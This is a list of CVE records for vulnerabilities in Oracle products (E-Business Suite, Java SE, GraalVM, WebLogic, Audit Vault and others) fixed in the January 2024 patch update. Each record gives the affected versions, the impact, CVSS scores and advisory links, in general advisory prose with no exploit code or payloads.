CVE 2024 20941 Candidate Vulnerability in the Oracle Installed Base product of Oracle E-Business Suite (component: HTML UI). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Installed Base. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Installed Base, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Installed Base accessible data as well as unauthorized read access to a subset of Oracle Installed Base accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20940 Candidate Vulnerability in the Oracle Knowledge Management product of Oracle E-Business Suite (component: Create, Update, Authoring Flow). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Knowledge Management, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Knowledge Management accessible data as well as unauthorized read access to a subset of Oracle Knowledge Management accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20939 Candidate Vulnerability in the Oracle CRM Technical Foundation product of Oracle E-Business Suite (component: Admin Console). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle CRM Technical Foundation. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle CRM Technical Foundation. CVSS 3.1 Base Score 4.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20938 Candidate Vulnerability in the Oracle iStore product of Oracle E-Business Suite (component: ECC). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle iStore. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle iStore, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle iStore accessible data as well as unauthorized read access to a subset of Oracle iStore accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20937 Candidate Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Monitoring and Diagnostics SEC). Supported versions that are affected are Prior to 9.2.8.1. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks of this vulnerability can result in unauthorized read access to a subset of JD Edwards EnterpriseOne Tools accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20936 Candidate Vulnerability in the Oracle One-to-One Fulfillment product of Oracle E-Business Suite (component: Documents). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle One-to-One Fulfillment. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle One-to-One Fulfillment, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle One-to-One Fulfillment accessible data as well as unauthorized read access to a subset of Oracle One-to-One Fulfillment accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20935 Candidate Vulnerability in the Oracle Installed Base product of Oracle E-Business Suite (component: Engineering Change Order). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Installed Base. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Installed Base, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Installed Base accessible data as well as unauthorized read access to a subset of Oracle Installed Base accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20932 Candidate Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 17.0.9; Oracle GraalVM for JDK: 17.0.9; Oracle GraalVM Enterprise Edition: 21.3.8 and 22.3.4. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N). CONFIRM:https://security.netapp.com/advisory/ntap-20240201-0002/ | MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20931 Candidate Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20930 Candidate Vulnerability in the Oracle Outside In Technology product of Oracle Fusion Middleware (component: Content Access SDK, Image Export SDK, PDF Export SDK, HTML Export SDK). The supported version that is affected is 8.5.6. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Outside In Technology. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Outside In Technology accessible data as well as unauthorized read access to a subset of Oracle Outside In Technology accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Outside In Technology. CVSS 3.1 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20929 Candidate Vulnerability in the Oracle Application Object Library product of Oracle E-Business Suite (component: DB Privileges). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Application Object Library. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Object Library accessible data as well as unauthorized read access to a subset of Oracle Application Object Library accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20928 Candidate Vulnerability in the Oracle WebCenter Content product of Oracle Fusion Middleware (component: Content Server). The supported version that is affected is 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebCenter Content. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Content, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle WebCenter Content accessible data as well as unauthorized read access to a subset of Oracle WebCenter Content accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20927 Candidate Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. While the vulnerability is in Oracle WebLogic Server, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 8.6 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20926 Candidate Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Scripting). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21; Oracle GraalVM for JDK: 17.0.9; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N). CONFIRM:https://security.netapp.com/advisory/ntap-20240201-0002/ | MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html | MLIST:[debian-lts-announce] 20240131 [SECURITY] [DLA 3728-1] openjdk-11 security update | URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00023.html Assigned (20231207)
CVE 2024 20925 Candidate Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u391; Oracle GraalVM Enterprise Edition: 20.3.12 and 21.3.8. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20924 Candidate Vulnerability in Oracle Audit Vault and Database Firewall (component: Firewall). Supported versions that are affected are 20.1-20.9. Difficult to exploit vulnerability allows high privileged attacker with network access via Oracle Net to compromise Oracle Audit Vault and Database Firewall. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Audit Vault and Database Firewall, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle Audit Vault and Database Firewall. CVSS 3.1 Base Score 7.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20923 Candidate Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u391; Oracle GraalVM Enterprise Edition: 20.3.12 and 21.3.8. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20922 Candidate Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u391; Oracle GraalVM Enterprise Edition: 20.3.12 and 21.3.8. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where Oracle Java SE, Oracle GraalVM Enterprise Edition executes to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 2.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N). CONFIRM:https://security.netapp.com/advisory/ntap-20240201-0002/ | MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20921 Candidate Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20920 Candidate Vulnerability in the Oracle Solaris product of Oracle Systems (component: Filesystem). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. While the vulnerability is in Oracle Solaris, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Solaris accessible data. CVSS 3.1 Base Score 3.8 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20919 Candidate Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can only be exploited by supplying data to APIs in the specified Component without using Untrusted Java Web Start applications or Untrusted Java applets, such as through a web service. CVSS 3.1 Base Score 5.9 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20918 Candidate Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N). CONFIRM:https://security.netapp.com/advisory/ntap-20240201-0002/ | MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html | MLIST:[debian-lts-announce] 20240131 [SECURITY] [DLA 3728-1] openjdk-11 security update | URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00023.html Assigned (20231207)
CVE 2024 20917 Candidate Vulnerability in the Oracle Enterprise Manager Base Platform product of Oracle Enterprise Manager (component: Log Management). The supported version that is affected is 13.5.0.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Enterprise Manager Base Platform. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Enterprise Manager Base Platform, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Enterprise Manager Base Platform accessible data as well as unauthorized update, insert or delete access to some of Oracle Enterprise Manager Base Platform accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Enterprise Manager Base Platform. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:L). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20916 Candidate Vulnerability in the Oracle Enterprise Manager Base Platform product of Oracle Enterprise Manager (component: Event Management). The supported version that is affected is 13.5.0.0. Easily exploitable vulnerability allows high privileged attacker with access to the physical communication segment attached to the hardware where the Oracle Enterprise Manager Base Platform executes to compromise Oracle Enterprise Manager Base Platform. While the vulnerability is in Oracle Enterprise Manager Base Platform, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Enterprise Manager Base Platform accessible data as well as unauthorized access to critical data or complete access to all Oracle Enterprise Manager Base Platform accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Enterprise Manager Base Platform. CVSS 3.1 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:L). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20915 Candidate Vulnerability in the Oracle Application Object Library product of Oracle E-Business Suite (component: Login - SSO). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Application Object Library. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Application Object Library. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20914 Candidate Vulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: Core). The supported version that is affected is 8.8. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle ZFS Storage Appliance Kit executes to compromise Oracle ZFS Storage Appliance Kit. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle ZFS Storage Appliance Kit accessible data. CVSS 3.1 Base Score 2.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20913 Candidate Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: BI Platform Security). The supported version that is affected is 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20912 Candidate Vulnerability in Oracle Audit Vault and Database Firewall (component: Firewall). Supported versions that are affected are 20.1-20.9. Easily exploitable vulnerability allows high privileged attacker with network access via Oracle Net to compromise Oracle Audit Vault and Database Firewall. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Audit Vault and Database Firewall accessible data. CVSS 3.1 Base Score 2.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20911 Candidate Vulnerability in Oracle Audit Vault and Database Firewall (component: Firewall). Supported versions that are affected are 20.1-20.9. Difficult to exploit vulnerability allows high privileged attacker with network access via Oracle Net to compromise Oracle Audit Vault and Database Firewall. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Audit Vault and Database Firewall, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Audit Vault and Database Firewall accessible data. CVSS 3.1 Base Score 2.6 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:N/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20910 Candidate Vulnerability in Oracle Audit Vault and Database Firewall (component: Firewall). Supported versions that are affected are 20.1-20.9. Difficult to exploit vulnerability allows high privileged attacker with network access via Oracle Net to compromise Oracle Audit Vault and Database Firewall. While the vulnerability is in Oracle Audit Vault and Database Firewall, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Audit Vault and Database Firewall accessible data. CVSS 3.1 Base Score 3.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:N/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20909 Candidate Vulnerability in Oracle Audit Vault and Database Firewall (component: Firewall). Supported versions that are affected are 20.1-20.9. Easily exploitable vulnerability allows unauthenticated attacker with network access via Oracle Net to compromise Oracle Audit Vault and Database Firewall. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Audit Vault and Database Firewall accessible data. CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20908 Candidate Vulnerability in the Oracle WebCenter Sites product of Oracle Fusion Middleware (component: Advanced UI). The supported version that is affected is 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Sites, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data as well as unauthorized read access to a subset of Oracle WebCenter Sites accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20907 Candidate Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: File download). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Web Applications Desktop Integrator, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Web Applications Desktop Integrator accessible data as well as unauthorized read access to a subset of Oracle Web Applications Desktop Integrator accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
CVE 2024 20906 Candidate Vulnerability in the Integrated Lights Out Manager (ILOM) product of Oracle Systems (component: System Management). Supported versions that are affected are 3, 4 and 5. Easily exploitable vulnerability allows high privileged attacker with network access via ICMP to compromise Integrated Lights Out Manager (ILOM). Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Integrated Lights Out Manager (ILOM), attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Integrated Lights Out Manager (ILOM) accessible data as well as unauthorized read access to a subset of Integrated Lights Out Manager (ILOM) accessible data. CVSS 3.1 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N). MISC:Oracle Advisory | URL:https://www.oracle.com/security-alerts/cpujan2024.html Assigned (20231207)
